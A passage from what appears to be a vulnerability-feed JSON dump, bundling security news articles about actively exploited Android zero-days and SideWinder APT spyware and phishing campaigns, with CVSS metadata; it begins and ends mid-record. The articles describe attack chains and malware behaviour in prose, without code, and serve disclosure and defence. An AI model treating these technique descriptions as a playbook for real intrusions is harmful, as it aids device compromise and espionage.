this depends on the manufacturer. Some users who haven't switched to new devices that still receive monthly security updates might even not be able to install these patches at all.\n\nStay safe, everyone!\n\nThe post [Android patches for 4 in-the-wild bugs are out, but when will you get them?](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/05/android-patches-for-4-in-the-wild-bugs-are-out-but-when-will-you-get-them/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-20T17:13:53", "type": "malwarebytes", "title": "Android patches for 4 in-the-wild bugs are out, but when will you get them?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1905", "CVE-2021-1906", "CVE-2021-28663", "CVE-2021-28664"], "modified": "2021-05-20T17:13:53", "id": "MALWAREBYTES:EB04567CC0DCC2AA6FDDD6A780E6AFE7", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/05/android-patches-for-4-in-the-wild-bugs-are-out-but-when-will-you-get-them/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:08", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEiH_ku-QrzXLuWobEQwNeCU-1szXQE_YfU7-27jchcPvQch2oAG-unVPYTeIA9mD8dCRQKYOdycKdKQejYSAQDLOBNrC8o_iHMZtXakx0WEiJMrBaV54fvlywQNqzISF_c_16nYrItctTkviCxzwdXakAUJttFAEPo3UwwTfqKrp6jng_lB8VtW0jt9)](<https://thehackernews.com/new-images/img/a/AVvXsEiH_ku-QrzXLuWobEQwNeCU-1szXQE_YfU7-27jchcPvQch2oAG-unVPYTeIA9mD8dCRQKYOdycKdKQejYSAQDLOBNrC8o_iHMZtXakx0WEiJMrBaV54fvlywQNqzISF_c_16nYrItctTkviCxzwdXakAUJttFAEPo3UwwTfqKrp6jng_lB8VtW0jt9>)\n\nGoogle has rolled out its monthly security patches for Android with fixes for 39 flaws, including a zero-day vulnerability that it said is being actively exploited in the wild in limited, targeted attacks.\n\nTracked as **CVE-2021-1048**, the zero-day bug is described as a [use-after-free vulnerability](<https://cwe.mitre.org/data/definitions/416.html>) in the kernel that can be exploited for local privilege escalation. Use-after-free issues are dangerous as it could enable a threat actor to access or referencing memory after it has been freed, leading to a \"[write-what-where](<https://cwe.mitre.org/data/definitions/123.html>)\" condition that results in the execution of arbitrary code to gain control over a victim's system.\n\n\"There are indications that CVE-2021-1048 may be under limited, targeted exploitation,\" the company [noted](<https://source.android.com/security/bulletin/2021-11-01>) in its November advisory without revealing technical details of the vulnerability, the nature of the intrusions, and the identities of the attackers that may have abused the flaw.\n\nAlso remediated in the security patch are two critical remote code execution (RCE) vulnerabilities \u2014 CVE-2021-0918 and CVE-2021-0930 \u2014 in the System component that could allow remote adversaries to execute malicious code within the context of a privileged process by sending a specially-crafted transmission to targeted devices.\n\nTwo more critical flaws, CVE-2021-1924 and CVE-2021-1975, affect Qualcomm closed-source components, while a fifth critical vulnerability in Android TV (CVE-2021-0889) could permit an attacker in close proximity to silently pair with a TV and execute arbitrary code with no privileges or user interaction required.\n\nWith the latest round of updates, Google has addressed a [total](<https://thehackernews.com/2021/03/warning-new-android-zero-day.html>) of [six zero-days](<https://thehackernews.com/2021/05/android-issues-patches-for-4-new-zero.html>) in Android since the start of the year \u2014\n\n * [**CVE-2020-11261**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11261>) (CVSS score: 8.4) - Improper input validation in Qualcomm Graphics component\n * [**CVE-2021-1905**](<https://nvd.nist.gov/vuln/detail/CVE-2021-1905>) (CVSS score: 8.4) - Use-after-free in Qualcomm Graphics component\n * [**CVE-2021-1906**](<https://nvd.nist.gov/vuln/detail/CVE-2021-1906>) (CVSS score: 6.2) - Detection of error condition without action in Qualcomm Graphics component\n * [**CVE-2021-28663**](<https://nvd.nist.gov/vuln/detail/CVE-2021-28663>) (CVSS score: 8.8) - Mali GPU Kernel Driver allows improper operations on GPU memory\n * [**CVE-2021-28664**](<https://nvd.nist.gov/vuln/detail/CVE-2021-28664>) (CVSS score: 8.8) - Mali GPU Kernel Driver elevates CPU RO pages to writable\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T05:20:00", "type": "thn", "title": "Google Warns of New Android 0-Day Vulnerability Under Active Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11261", "CVE-2021-0889", "CVE-2021-0918", "CVE-2021-0930", "CVE-2021-1048", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-1924", "CVE-2021-1975", "CVE-2021-28663", "CVE-2021-28664"], "modified": "2021-11-03T05:20:12", "id": "THN:37E4ECDE5CC5E074EC9FD4DF79D85121", "href": "https://thehackernews.com/2021/11/google-warns-of-new-android-0-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:25", "description": "[![](https://thehackernews.com/images/-fZV9AOkLFZw/YFl4ojMBVdI/AAAAAAAACFY/lDGhJ2azIxIuCePPX34BZU4H_0mtmSfrgCLcBGAsYHQ/s0/android-adb-hack.png)](<https://thehackernews.com/images/-fZV9AOkLFZw/YFl4ojMBVdI/AAAAAAAACFY/lDGhJ2azIxIuCePPX34BZU4H_0mtmSfrgCLcBGAsYHQ/s0/android-adb-hack.png>)\n\nGoogle has disclosed that a now-patched vulnerability affecting Android devices that use Qualcomm chipsets is being weaponized by adversaries to launch targeted attacks.\n\nTracked as **CVE-2020-11261** (CVSS score 8.4), the flaw [concerns](<https://www.qualcomm.com/company/product-security/bulletins/january-2021-bulletin>) an \"improper input validation\" issue in Qualcomm's Graphics component that could be exploited to trigger memory corruption when an attacker-engineered app requests access to a huge chunk of the device's memory.\n\n\"There are indications that CVE-2020-11261 may be under limited, targeted exploitation,\" the search giant [said](<https://source.android.com/security/bulletin/2021-01-01>) in an updated January security bulletin on March 18.\n\nCVE-2020-11261 was discovered and reported to Qualcomm by Google's Android Security team on July 20, 2020, after which it was fixed in January 2021.\n\n[![](https://thehackernews.com/images/-hngRw5Tf0vA/YFl3-qMvHtI/AAAAAAAACFQ/DZiVZPyGy7gyqDc233jO0YbxnggQbhdrwCLcBGAsYHQ/s0/android.jpg)](<https://thehackernews.com/images/-hngRw5Tf0vA/YFl3-qMvHtI/AAAAAAAACFQ/DZiVZPyGy7gyqDc233jO0YbxnggQbhdrwCLcBGAsYHQ/s0/android.jpg>)\n\nIt's worth noting that the access vector for the vulnerability is \"local,\" meaning that exploitation requires local access to the device. In other words, to launch a successful attack, the bad actor must either have physical access to the vulnerable smartphone or use other means - e.g., a [watering hole](<https://en.wikipedia.org/wiki/Watering_hole_attack>) \\- to deliver malicious code and set off the attack chain.\n\nWhile specifics about the attacks, the identity of the attacker, and the targeted victims have not been released, it is not unusual for Google to withhold sharing such information to prevent other threat actors from taking advantage of the vulnerability.\n\nIf anything, the development once again underscores the need to promptly install monthly security updates as soon as they are available to prevent Android devices from being exploited. We've reached out to Google for comment and will update this article if we hear back.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T05:33:00", "type": "thn", "title": "WARNING: A New Android Zero-Day Vulnerability Is Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11261"], "modified": "2021-03-23T10:57:24", "id": "THN:EF60CC49D6364DA3E070A9958D3CCDB7", "href": "https://thehackernews.com/2021/03/warning-new-android-zero-day.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:53", "description": "[![android virus](https://thehackernews.com/images/-cLLxtvGExsY/XhS0mZWJkhI/AAAAAAAA2JE/lnw3iNpocfQvb_IAskktG4fIxUlmYPXYACLcBGAsYHQ/s728-e100/android-virus.jpg)](<https://thehackernews.com/images/-cLLxtvGExsY/XhS0mZWJkhI/AAAAAAAA2JE/lnw3iNpocfQvb_IAskktG4fIxUlmYPXYACLcBGAsYHQ/s728-e100/android-virus.jpg>)\n\nWatch out! If you have any of the below-mentioned file managers and photography apps installed on your Android phone\u2014even if downloaded from the official Google Store store\u2060\u2014you have been hacked and being tracked. \n \nThese newly detected malicious Android apps are **Camero**, **FileCrypt**, and** callCam** that are believed to be linked to Sidewinder APT, a sophisticated hacking group specialized in cyber espionage attacks. \n \nAccording to cybersecurity researchers at Trend Micro, these apps were exploiting a critical use-after-free [vulnerability in Android](<https://thehackernews.com/2019/10/android-kernel-vulnerability.html>) at least since March last year\u2060\u2014that's 7 months before the same flaw was first discovered as zero-day when Google researcher analysed a separate attack developed by Israeli surveillance vendor NSO Group. \n \n\"We speculate that these apps have been active since March 2019 based on the certificate information on one of the apps,\" the researchers [said](<https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/>). \n \nTracked as [CVE-2019-2215](<https://thehackernews.com/2019/10/android-kernel-vulnerability.html>), the vulnerability is a local privilege escalation issue that allows full root compromise of a vulnerable device and could also be exploited remotely when combined with a separate browser rendering flaw. \n \n\n\n## This Spyware Secretly Root Your Android Phone\n\n \nAccording to Trend Micro, FileCrypt Manager and Camero act as droppers and connect to a remote command and control server to download a DEX file, which then downloads the callCam app and tries to install it by exploiting privilege escalation vulnerabilities or abusing accessibility feature. \n\n\n[![remove android virus](https://thehackernews.com/images/-jHqKtmIKYZU/XhSwpBHfNKI/AAAAAAAA2I4/IJ2bd5VjNl4tmSdX8Gadj0H3aU6PlkESACLcBGAsYHQ/s728-e100/android-virus-remove.jpg)](<https://thehackernews.com/images/-jHqKtmIKYZU/XhSwpBHfNKI/AAAAAAAA2I4/IJ2bd5VjNl4tmSdX8Gadj0H3aU6PlkESACLcBGAsYHQ/s728-e100/android-virus-remove.jpg>)\n\n\"All of this is done without user awareness or intervention. To evade detection, it uses many techniques such as obfuscation, data encryption, and invoking dynamic code,\" the researchers said. \n \nOnce installed, the callCam hides its icon from the menu, collects the following information from the compromised device, and sends it back to the attacker's C&C server in the background: \n \n\n\n * Location\n * Battery status\n * Files on device\n * Installed app list\n * Device information\n * Sensor information\n * Camera information\n * Screenshot\n * Account\n * Wifi information\n * Data from WeChat, Outlook, Twitter, Yahoo Mail, Facebook, Gmail, and Chrome.\n \nBesides CVE-2019-2215, the malicious apps also try to exploit a separate vulnerability in the MediaTek-SU driver to get root privilege and stay persistent on a wide range of Android handsets. \n \nBased on the overlap in location of the command and control servers, researchers have attributed the campaign to SideWinder, believed to be an Indian espionage group that historically targeted organizations linked to the Pakistani Military. \n \n\n\n## How to Protect Android Phone from Malware\n\n \nGoogle has now removed all the above-mentioned malicious apps from Play Store, but since Google systems are not sufficient to keep bad apps out of the official store, you have to be very careful about downloading apps. \n \nTo check if your device is being infected with this malware, go to Android system settings \u2192 App Manager, look for listed package names and uninstall it. \n \nTo protect your device against most cyber threats, you are recommended to take simple but effective precautions like: \n \n\n\n * keep devices and apps up-to-date,\n * avoid app downloads from unfamiliar sources,\n * always pay close attention to the permissions requested by apps,\n * frequently back up data, and\n * install a good antivirus app that protects against this malware and similar threats.\n \nTo prevent yourself from being targeted by such apps, always beware of fishy apps, even when downloading from Google Play Store, and try to stick to the trusted brands only. In addition, always look at the app reviews left by other users who have downloaded the app, and also verify app permissions before installing any app and grant only those permissions that are relevant for the app's purpose. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-07T16:41:00", "type": "thn", "title": "3 Google Play Store Apps Exploit Android Zero-Day Used by NSO Group", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2020-01-07T16:41:42", "id": "THN:72A5D71BAB2248262B7A53E955BB655D", "href": "https://thehackernews.com/2020/01/android-zero-day-malware-apps.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-09T16:28:59", "description": "[![advanced persistent threat](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhmGzMDAbeeeo9usWoQritepTCWHwBb3sTHQ28IDsqQLlhG8teu-kUjpmJkueyAAyrXWiFxcwD8AvZTrTIpszl6Ho3ANJDfc_OvWQvdCHcnhRTUlUHIvotdd-qUpFNQPanYKh8dRi5vJMjhgQgYfFiXwd48dKjp_Lu2VuUfECnA17t-g25plhJGQXug/s728-e365/code.png>)\n\nThe advanced persistent threat (APT) actor known as SideWinder has been accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022.\n\n\"In this campaign, the SideWinder advanced persistent threat (APT) group used a server-based polymorphism technique to deliver the next stage payload,\" the BlackBerry Research and Intelligence Team [said](<https://blogs.blackberry.com/en/2023/05/sidewinder-uses-server-side-polymorphism-to-target-pakistan>) in a technical report published Monday.\n\nAnother campaign discovered by the Canadian cybersecurity company in early March 2023 shows that Turkey has also landed in the crosshairs of the threat actor's collection priorities.\n\n[SideWinder](<https://thehackernews.com/2023/02/researchers-link-sidewinder-group-to.html>) has been on the radar since at least 2012 and it's primarily known to target various Southeast Asian entities located in Pakistan, Afghanistan, Bhutan, China, Myanmar, Nepal, and Sri Lanka.\n\nSuspected to be an Indian state-sponsored group, SideWinder is also tracked under the monikers APT-C-17, APT-Q-39, Hardcore Nationalist (HN2), Rattlesnake, Razor Tiger, and T-APT4.\n\nTypical attack sequences mounted by the actor entail using carefully crafted email lures and [DLL side-loading techniques](<https://attack.mitre.org/techniques/T1574/002/>) to fly under the radar and deploy malware capable of granting the actors remote access to the targeted systems.\n\nOver the past year, SideWinder has been linked to a cyber [attack aimed](<https://zhuanlan.zhihu.com/p/593797356>) at Pakistan Navy War College (PNWC) as well as an [Android malware campaign](<https://zhuanlan.zhihu.com/p/530163085>) that leveraged rogue phone cleaner and VPN apps uploaded to the Google Play Store to [harvest sensitive information](<https://www.trendmicro.com/en_us/research/20/a/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group.html>).\n\nThe latest infection chain documented by BlackBerry mirrors findings from Chinese cybersecurity firm QiAnXin in December 2022 detailing the use of PNWC lure documents to drop a lightweight .NET-based backdoor (App.dll) that's capable of retrieving and executing next-stage malware from a remote server.\n\nWhat makes the campaign also stand out is the threat actor's use of server-based polymorphism as a way to potentially sidestep traditional signature-based antivirus (AV) detection and distribute additional payloads by responding with two different versions of an intermediate RTF file.\n\nSpecifically, the [PNWC document](<https://www.virustotal.com/gui/file/cd09bf437f46210521ad5c21891414f236e29aa6869906820c7c9dc2b565d8be/details>) employs a method known as [remote template injection](<https://attack.mitre.org/techniques/T1221/>) to fetch the RTF file such that it harbors the malicious code only if the request originates from a user in the Pakistan IP address range.\n\n\"It is important to note that in both instances, only the name of the file 'file.rtf' and the file type are the same; however, the contents, file size and the file hash are different,\" BlackBerry explained.\n\n\"If the user is not in the Pakistani IP range, the server returns an 8-byte RTF file (file.rtf) that contains a single string: {\\rtf1 }. However, if the user is within the Pakistani IP range, the server then returns the RTF payload, which varies between 406 KB \u2013 414 KB in size.\"\n\nThe disclosure arrives shortly after Fortinet and Team Cymru [disclosed](<https://thehackernews.com/2023/05/sidecopy-using-action-rat-and-allakore.html>) details of attacks perpetrated by a Pakistan-based threat actor known as SideCopy against Indian defense and military targets.\n\n\"The latest SideWinder campaign targeting Turkey overlaps with the most recent developments in geopolitics; specifically, in Turkey's [support of Pakistan](<https://www.logically.ai/factchecks/library/f715d792>) and the ensuing [reaction](<https://www.hindustantimes.com/videos/news/turkey-not-our-friend-indian-twitter-fumes-after-erdogan-govt-targets-india-over-kashmir-101678213742252.html>) from India,\" BlackBerry said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-09T09:39:00", "type": "thn", "title": "Researchers Uncover SideWinder's Latest Server-Based Polymorphism Technique", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2023-05-09T16:23:03", "id": "THN:A9FAC44309C9B2D7E67EE09C0B97EE1F", "href": "https://thehackernews.com/2023/05/researchers-uncover-sidewinders-latest.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:43", "description": "[![android vulnerability](https://thehackernews.com/images/-2IKnV_yj8uM/XZcJVuI3cKI/AAAAAAAA1VQ/0fCNskUYN-0tpBkIQZxxz_1JOJDIER65ACLcBGAsYHQ/s728-e100/android-vulnerability.png)](<https://thehackernews.com/images/-2IKnV_yj8uM/XZcJVuI3cKI/AAAAAAAA1VQ/0fCNskUYN-0tpBkIQZxxz_1JOJDIER65ACLcBGAsYHQ/s728-e100/android-vulnerability.png>)\n\nAnother day, another revelation of a critical unpatched zero-day vulnerability, this time in the world's most widely used mobile operating system, Android. \n \nWhat's more? The Android zero-day vulnerability has also been found to be exploited in the wild by the Israeli surveillance vendor NSO Group\u2014infamous for selling zero-day exploits to governments\u2014or one of its customers, to gain control of their targets' Android devices. \n \nDiscovered by Project Zero researcher Maddie Stone, the details and a proof-of-concept exploit for the high-severity security vulnerability, tracked as CVE-2019-2215, has been made public today\u2014just seven days after reporting it to the Android security team. \n \nThe zero-day is a use-after-free vulnerability in the Android kernel's binder driver that can allow a local privileged attacker or an app to escalate their privileges to gain root access to a vulnerable device and potentially take full remote control of the device. \n \n\n\n## Vulnerable Android Devices\n\n \nThe vulnerability resides in versions of Android kernel released before April last year, a patch for which was included in the 4.14 LTS Linux kernel released in December 2017 but was only incorporated in AOSP Android kernel versions 3.18, 4.4 and 4.9. \n \nTherefore, most Android devices manufactured and sold by a majority of vendors with the unpatched kernel are still vulnerable to this vulnerability even after having the latest Android updates, including below-listed popular smartphone models : \n \n\n\n * Pixel 1\n * Pixel 1 XL\n * Pixel 2\n * Pixel 2 XL\n * Huawei P20\n * Xiaomi Redmi 5A\n * Xiaomi Redmi Note 5\n * Xiaomi A1\n * Oppo A3\n * Moto Z3\n * Oreo LG phones\n * Samsung S7\n * Samsung S8\n * Samsung S9\n \nTo be noted, Pixel 3, 3 XL, and 3a devices running the latest Android kernels are not vulnerable to the issue. \n \n\n\n## Android Flaw Can Be Exploited Remotely\n\n \nAccording to the researcher, since the issue is \"accessible from inside the Chrome sandbox,\" the Android kernel zero-day vulnerability can also be exploited remotely by combining it with a separate Chrome rendering flaw. \n \n\"The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the Web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox,\" Stone [says](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1942>) in the Chromium blog. \n \n\n\n> \"I've attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when running locally. It only requires the untrusted app code execution to exploit CVE-2019-2215. I've also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019.\"\n\n \n\n\n## Patches to be Made Available Soon\n\n \nThough Google will release a patch for this vulnerability in its October's Android Security Bulletin in the coming days and also notified OEMs, most affected devices would not likely receive the patch immediately, unlike Google Pixel 1 and 2. \n \n \n \n\n\n> \"This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,\" the Android security team said in a statement.\n\n \n\n\n> \"We have notified Android partners, and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.\"\n\n \nGoogle's Project Zero division usually gives software developers a 90-day deadline to fix the issue in their affected products before going public with the details and PoC exploits, but in case of active exploits, the team goes public after seven days of privately being reported.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-04T09:03:00", "type": "thn", "title": "New 0-Day Flaw Affecting Most Android Phones Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2019-10-04T09:12:58", "id": "THN:E25E9F7F90F8EF4E9E484972EB0AF3FD", "href": "https://thehackernews.com/2019/10/android-kernel-vulnerability.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T03:56:15", "description": "[![Fake Android VPN Apps](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhjQOYmPXHvs2MqNnuWfkjG4UZVA6Jz16zw2DgSwqbvJ3omc8RzgCEBkzFpCT6ry5yW_5M5oWHTpIrhCJcbvULokaI5Zh2SZP4jikf6Jj1rjdFJQb99fwFeYcsq_rcZXXR2j2atYFHSkl2OcSoYuZRkwOvepfgcy5wCZ0oaZ3nr5hczUh3_9wwv9mCD/s728-e1000/pakistani-hackers.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhjQOYmPXHvs2MqNnuWfkjG4UZVA6Jz16zw2DgSwqbvJ3omc8RzgCEBkzFpCT6ry5yW_5M5oWHTpIrhCJcbvULokaI5Zh2SZP4jikf6Jj1rjdFJQb99fwFeYcsq_rcZXXR2j2atYFHSkl2OcSoYuZRkwOvepfgcy5wCZ0oaZ3nr5hczUh3_9wwv9mCD/s728-e100/pakistani-hackers.jpg>)\n\nThe threat actor known as SideWinder has added a new custom tool to its arsenal of malware that's being used in phishing attacks against Pakistani public and private sector entities.\n\n\"Phishing links in emails or posts that mimic legitimate notifications and services of government agencies and organizations in Pakistan are primary attack vectors of the gang,\" Singapore-headquartered cybersecurity company Group-IB [said](<https://blog.group-ib.com/sidewinder-antibot>) in a Wednesday report.\n\nSideWinder, also tracked under the monikers Hardcore Nationalist, Rattlesnake, Razor Tiger, and T-APT-04, has been active since at least 2012 with a primary focus on Pakistan and other Central Asian countries like Afghanistan, Bangladesh, Nepal, Singapore, and Sri Lanka.\n\nLast month, Kaspersky [attributed](<https://thehackernews.com/2022/05/sidewinder-hackers-launched-over-1000.html>) to this group over 1,000 cyber attacks that took place in the past two years, while calling out its persistence and sophisticated obfuscation techniques.\n\nThe threat actor's modus operandi involves the use of spear-phishing emails to distribute malicious ZIP archives containing RTF or LNK files, which download an HTML Application (HTA) payload from a remote server.\n\n[![Fake Android VPN Apps](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiwcuovN-tLFG12oSOpk6CKiezvQGHGLbURRXqSvfQ4F61BHsJutBgqDGUWgvCuzr9RMY5191830jgT9ZQ4YCYVyfqOSDCOQKh6g-NT7uBuKnYZC9XRjEqNiwby2LzwoZRAt1ZuVknL8XIJ-Ge1bJUAlCKMpVWNZTnjQHe4PxXd_cx23-mYoGZejtqY/s728-e1000/pakistani-hackers-2.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiwcuovN-tLFG12oSOpk6CKiezvQGHGLbURRXqSvfQ4F61BHsJutBgqDGUWgvCuzr9RMY5191830jgT9ZQ4YCYVyfqOSDCOQKh6g-NT7uBuKnYZC9XRjEqNiwby2LzwoZRAt1ZuVknL8XIJ-Ge1bJUAlCKMpVWNZTnjQHe4PxXd_cx23-mYoGZejtqY/s728-e100/pakistani-hackers-2.jpg>)\n\nThis is achieved by embedding 